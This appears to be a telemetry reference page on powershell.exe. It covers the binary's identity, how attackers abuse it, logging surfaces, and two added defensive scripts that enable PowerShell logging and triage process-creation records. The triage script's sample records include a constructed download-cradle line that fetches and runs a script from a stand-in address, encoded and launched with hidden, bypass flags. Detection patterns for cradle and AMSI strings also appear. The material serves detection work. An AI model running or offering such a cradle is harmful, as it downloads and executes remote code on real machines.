Process
powershell.exe
powershell.exe is Windows PowerShell, Microsoft's command-line shell and scripting language for administration and automation. Built on .NET, it runs commands called cmdlets and full scripts that manage almost every part of the system: files, the registry, services, processes, the event log, and remote machines. It ships with Windows and is a mainstay of both legitimate administration and attacker tooling.
File identity
- File type
- PE32+ executable
- Magic
- PE32+ executable (console)
- Original name
- PowerShell.EXE.MUI
- Internal name
- POWERSHELL
- Product
- Microsoft® Windows® Operating System
- Status
- Signed
- Publisher
- Microsoft Corporation
- Signer
- Microsoft Windows
- Issuer
- Microsoft Windows Production PCA 2011
- Signature rate
- 100%
- Version
- 10.0.26100.8457 (WinBuild.160101.0800) (100%)
- Size
- 444.00 KB (100%)
Execution context
- Image path
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (100%)
Not observed.
Not observed.
1 (100%)
- Session
- Session 1 (100%)
- Privileges
- SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeImpersonatePrivilege, SeDebugPrivilege (each 100%)
Ancestry
Not observed.
Not observed.
Not observed.
Not observed.
Behavior
wbemsvc.dll, wbemcomn.dll, fastprox.dll, wbemprox.dll, wmidcom.dll (each 100%)
Not observed.
lsass.exe, nissrv.exe, microsoftedgeupdate.exe, taskhostw.exe, vm3dservice.exe (each 100%)
Not observed.
Indicators
Not observed.
Analysis
Windows PowerShell is built on the .NET Framework and works by loading and running cmdlets, small .NET classes, alongside scripts written in the PowerShell language. The genuine binary lives at C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, with a 32-bit copy under SysWOW64. The v1.0 in that path is historical and has never changed: the in-box version on modern Windows is actually PowerShell 5.1. It is separate from PowerShell 7, whose binary is named pwsh.exe and installs under Program Files.
It can run interactively as a console or non-interactively from another program, taking a script file with -File, a literal command with -Command, or a base64-packed command with -EncodedCommand (the base64 of the command's UTF-16LE text, which is why a decoder has to use that encoding rather than UTF-8). powershell.exe also accepts abbreviated switches, any prefix of the name that is still unambiguous, so -e, -ec and -enc all mean -EncodedCommand, and -nop, -noni, -w and -ex are the usual shorthand in attacker command lines; a detection that matches only the full switch names misses them. Like any console program it is attached to a conhost.exe (or, under Windows Terminal, OpenConsole.exe). Crucially, powershell.exe is only the default host. The PowerShell engine itself lives in System.Management.Automation.dll, and any .NET program can load that DLL to run PowerShell code without ever starting powershell.exe.
Its parent is whatever started it: an interactive explorer.exe session, a logon or Group Policy script, the Task Scheduler, a software installer, or a management agent. A wide range of parents is therefore normal in administered environments, which is part of why the process is hard to baseline on behavior alone.
powershell.exe is the premier living-off-the-land tool on Windows (T1059.001). The signed in-box binary gives attackers a trusted way to run code entirely in memory (T1620), pull payloads down with a download cradle (T1105), and hide intent behind base64 or otherwise obfuscated commands (T1027.010). Because the binary itself is legitimate, path and signature checks pass. The evidence is in the command line (Security event 4688 with process command-line auditing enabled, or Sysmon event 1), the parent, and the network and file activity that follow.
PowerShell 5.0 and later expose a deep logging surface: script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, which records script text as the engine compiled it, so the inner blocks produced by an IEX of a decoded string are logged when they run), module logging (4103), transcription of whole sessions to text files, and live inspection of script content through AMSI before it runs. Attackers work to blind it (T1562, Impair Defenses) by patching AMSI in memory, disabling or clearing these logs, or downgrading to the PowerShell 2.0 engine (T1562.010), which predates all of them. Heavy use of -Version 2 is a tell, and the downgrade leaves its own trace: the classic Windows PowerShell log records every engine start as event 400 with the EngineVersion in the message, so a 2.0 engine start on a current host stands out even though 4104 stays silent for it. The 2.0 engine is an optional component that needs .NET Framework 3.5, has been deprecated since 2017 and is being removed from current Windows releases; where it is absent the flag fails with an error, but the attempt still shows in the command line.
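As an added example (not code from the original page), the logging controls above expressed as the policy registry values Group Policy itself writes, plus the two queries a responder would run for the evasion cases: 4104 script blocks carrying cradle or AMSI strings, and the classic engine-start event 400 that exposes a 2.0 downgrade. It needs an elevated session for the HKLM writes, and if a domain GPO manages these keys they should be set there instead. C:\PSTranscripts, the 24-hour window and the search pattern are assumptions for the demonstration, and the function names are this example's own.

```powershell
# Added example, not code from the original page. Policy keys below are the ones Group Policy
# writes for PowerShell logging; run from an elevated session. C:\PSTranscripts is an assumed path.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord') {
    # New-Item -Force creates intermediate keys; New-ItemProperty -Force overwrites an existing value.
    New-Item -Path "$policy\$Key" -Force | Out-Null
    New-ItemProperty -Path "$policy\$Key" -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')
    # Script block logging: 4104 in Microsoft-Windows-PowerShell/Operational, script text as compiled.
    Set-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging' 1
    # Module logging: 4103 pipeline-execution records; a ModuleNames value of '*' covers every module.
    Set-PolicyValue 'ModuleLogging' 'EnableModuleLogging' 1
    Set-PolicyValue 'ModuleLogging\ModuleNames' '*' '*' 'String'
    # Transcription: complete console input and output per session, written as text files.
    Set-PolicyValue 'Transcription' 'EnableTranscripting' 1
    Set-PolicyValue 'Transcription' 'EnableInvocationHeader' 1
    Set-PolicyValue 'Transcription' 'OutputDirectory' $TranscriptDir 'String'
    # Echo back what is now set so the change can be verified.
    Get-ChildItem -Path $policy -Recurse | Get-ItemProperty
}

function Get-SuspiciousScriptBlocks {
    # 4104 events matching cradle/AMSI strings. PowerShell 5 writes warning-level 4104 events for
    # blocks it deems suspicious even with the policy off, so this is worth running on unconfigured hosts.
    param([int]$Hours = 24,
          [string]$Pattern = 'Net\.WebClient|DownloadString|Invoke-WebRequest|FromBase64String|amsi')
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $Pattern } |
        Select-Object TimeCreated, LevelDisplayName, @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(160, $_.Message.Length)) } }
}

function Get-PowerShellDowngrades {
    # Every engine start lands in the classic 'Windows PowerShell' log as event 400, with EngineVersion
    # and HostApplication (the launching command line) in the message. 4104 is silent for a 2.0 engine.
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.' } |
        Select-Object TimeCreated, @{ n = 'HostApplication'; e = { [regex]::Match($_.Message, 'HostApplication=([^\r\n]*)').Groups[1].Value } }
}

Enable-PowerShellLogging
Get-PowerShellDowngrades -Hours 168 | Format-Table -AutoSize
Get-SuspiciousScriptBlocks | Format-Table -Wrap
```

Transcription and module logging are verbose; the transcript directory needs an ACL that lets every user append but not read or delete others' files, and both should feed a collector rather than sit on the host, since clearing local logs is one of the evasions the paragraph above describes.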
Absence is not safety. Because the engine is just a DLL, attackers run PowerShell through their own .NET host, so-called unmanaged or fileless PowerShell, and powershell.exe never appears in the process tree. A quiet powershell.exe does not mean PowerShell was not used. Two things still give such a host away: it must load System.Management.Automation.dll (or its native image, System.Management.Automation.ni.dll), so an image-load record such as Sysmon event 7 for that DLL in a process other than powershell.exe or pwsh.exe is the check; and because script block logging and AMSI live in the engine rather than the host, 4104 events and AMSI scans still fire for a custom host unless the attacker has disabled them.
- Image path other than C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe or its SysWOW64 copy (high)
- A long base64 blob passed to -EncodedCommand or one of its abbreviations (-e, -ec, -enc) (high)
- Download-cradle code in the command line (Net.WebClient, Invoke-WebRequest, DownloadString, iwr, iex) (high)
- Parent is an Office application, wscript.exe, cscript.exe, or mshta.exe (high)
- Hidden non-interactive launch flags together (-WindowStyle Hidden, -NonInteractive, -NoProfile, -ExecutionPolicy Bypass) (med)
- Outbound connections to hosts outside the environment shortly after launch (med)
- A powershell.exe child spawning cmd.exe, rundll32.exe, or other LOLBINs (med)
- Explicitly loading the legacy engine with -Version 2 (med)
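As an added example that is not code from the original page, the launch modes and switch abbreviations described in the analysis, and the indicator list above, turned into a triage function: it resolves abbreviated switches the way powershell.exe does, decodes -EncodedCommand (base64 of UTF-16LE text, nested layers included) and scores a process-creation record against the indicators that can be judged from image path, parent and command line alone. The outbound-connection and child-process indicators need other telemetry and are not modelled. The three sample records, the 192.0.2.10 address and the script paths are constructed for the demonstration, the function names are this example's own, and the switch table covers the common powershell.exe switches rather than all of them.

```powershell
# Added example, not code from the original page: normalize and decode a powershell.exe
# command line, then score a process-creation record against the indicators listed above.
# powershell.exe accepts any prefix of a switch name that is at least as long as the
# switch's minimum abbreviation; this table covers the common switches, not every one.
$script:SwitchMinimums = @{
    'encodedcommand' = 'e'; 'command' = 'c'; 'file' = 'f'; 'executionpolicy' = 'ex'
    'noprofile' = 'nop'; 'noninteractive' = 'noni'; 'windowstyle' = 'w'; 'version' = 'v'
    'noexit' = 'noe'; 'nologo' = 'nol'; 'sta' = 'sta'; 'mta' = 'mta'
}

function Resolve-PowerShellSwitch {
    # -e, -ec, -enc and -EncodedCommand all resolve to 'encodedcommand'; unknown or too short -> $null.
    param([string]$Token)
    $key = $Token.TrimStart('-', '/').ToLowerInvariant()
    foreach ($full in $script:SwitchMinimums.Keys) {
        if ($full.StartsWith($key) -and $key.Length -ge $script:SwitchMinimums[$full].Length) { return $full }
    }
    return $null
}

function Get-PowerShellSwitches {
    # Whitespace tokenizing is enough for triage; pairs each recognized switch with the token after it.
    param([string]$CommandLine)
    $tokens = @($CommandLine -split '\s+' | Where-Object { $_ })
    $pairs = @()
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        if ($tokens[$i] -notmatch '^[-/]') { continue }
        $name = Resolve-PowerShellSwitch $tokens[$i]
        if (-not $name) { continue }
        $value = if ($i + 1 -lt $tokens.Count -and $tokens[$i + 1] -notmatch '^[-/]') { $tokens[$i + 1].Trim('"', "'") } else { $null }
        $pairs += [pscustomobject]@{ Switch = $name; Value = $value }
    }
    return ,$pairs
}

function ConvertFrom-EncodedCommand {
    # -EncodedCommand carries base64 of the UTF-16LE command text; unwrap nested layers, innermost last.
    param([string]$CommandLine, [int]$MaxDepth = 5)
    $layers = @(); $current = $CommandLine
    for ($depth = 0; $depth -lt $MaxDepth; $depth++) {
        $enc = @(Get-PowerShellSwitches $current | Where-Object { $_.Switch -eq 'encodedcommand' -and $_.Value })
        if ($enc.Count -eq 0) { break }
        try { $current = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc[0].Value)) } catch { break }
        $layers += $current
    }
    return ,$layers
}

function Invoke-PowerShellTriage {
    param([Parameter(Mandatory)][string]$Image, [Parameter(Mandatory)][string]$CommandLine, [string]$ParentImage = '')
    $findings = @()
    if ($Image -notmatch '^(?i)C:\\Windows\\(System32|SysWOW64)\\WindowsPowerShell\\v1\.0\\powershell\.exe$') {
        $findings += [pscustomobject]@{ Severity = 'high'; Reason = "image path is not an in-box location: $Image" }
    }
    $parent = [IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    if ($parent -in @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe')) {
        $findings += [pscustomobject]@{ Severity = 'high'; Reason = "parent is $parent" }
    }
    $switches = Get-PowerShellSwitches $CommandLine
    $layers = ConvertFrom-EncodedCommand $CommandLine
    if ($layers.Count -gt 0) {
        $findings += [pscustomobject]@{ Severity = 'high'; Reason = "encoded command, $($layers.Count) layer(s): $($layers[-1])" }
    }
    # Cradle code may sit in the visible command line or only inside a decoded layer.
    if (($CommandLine + ' ' + ($layers -join ' ')) -match '(?i)Net\.WebClient|Invoke-WebRequest|DownloadString|\biwr\b|\biex\b|Invoke-Expression') {
        $findings += [pscustomobject]@{ Severity = 'high'; Reason = 'download-cradle code in command text' }
    }
    $quiet = @($switches | Where-Object {
        ($_.Switch -eq 'windowstyle' -and $_.Value -match '^(?i)hidden$') -or
        ($_.Switch -eq 'executionpolicy' -and $_.Value -match '^(?i)(bypass|unrestricted)$') -or
        ($_.Switch -in @('noninteractive', 'noprofile')) })
    if ($quiet.Count -ge 2) {
        $findings += [pscustomobject]@{ Severity = 'med'; Reason = "quiet launch flags: $(($quiet | ForEach-Object { '-' + $_.Switch }) -join ' ')" }
    }
    if ($switches | Where-Object { $_.Switch -eq 'version' -and $_.Value -match '^2(\.0)?$' }) {
        $findings += [pscustomobject]@{ Severity = 'med'; Reason = 'requests the legacy 2.0 engine (-Version 2)' }
    }
    return ,$findings
}

# Constructed sample records, not real telemetry; 192.0.2.10 is a documentation address.
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$inbox   = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$samples = @(
    @{ Image = $inbox; ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
       CommandLine = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc $encoded" }
    @{ Image = $inbox; ParentImage = 'C:\Windows\System32\svchost.exe'
       CommandLine = 'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\Inventory.ps1' }
    @{ Image = 'C:\Users\Public\powershell.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'powershell.exe -v 2 -nop -c "Get-Process"' }
)
foreach ($s in $samples) {
    $findings = Invoke-PowerShellTriage @s
    "{0} finding(s): {1}" -f $findings.Count, $s.CommandLine.Substring(0, [Math]::Min(70, $s.CommandLine.Length))
    $findings | ForEach-Object { "  [{0}] {1}" -f $_.Severity, $_.Reason }
}
```

The first record trips the parent, encoded-command, cradle and quiet-flag checks; the second, an administrator's scheduled inventory script, trips none because -NoProfile on its own is not a tell and RemoteSigned is not Bypass; the third trips the image-path and -Version 2 checks. Real records from Security event 4688 or Sysmon event 1 go into Invoke-PowerShellTriage with the same three fields, and the decoded layers are what to pivot on when the visible command line is just a blob.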
Telemetry
- Operating system
- Microsoft Windows 11 Enterprise Evaluation (100%)
- First seen
- 2026-06-08
- Last seen
- 2026-06-08
- Machines
- 1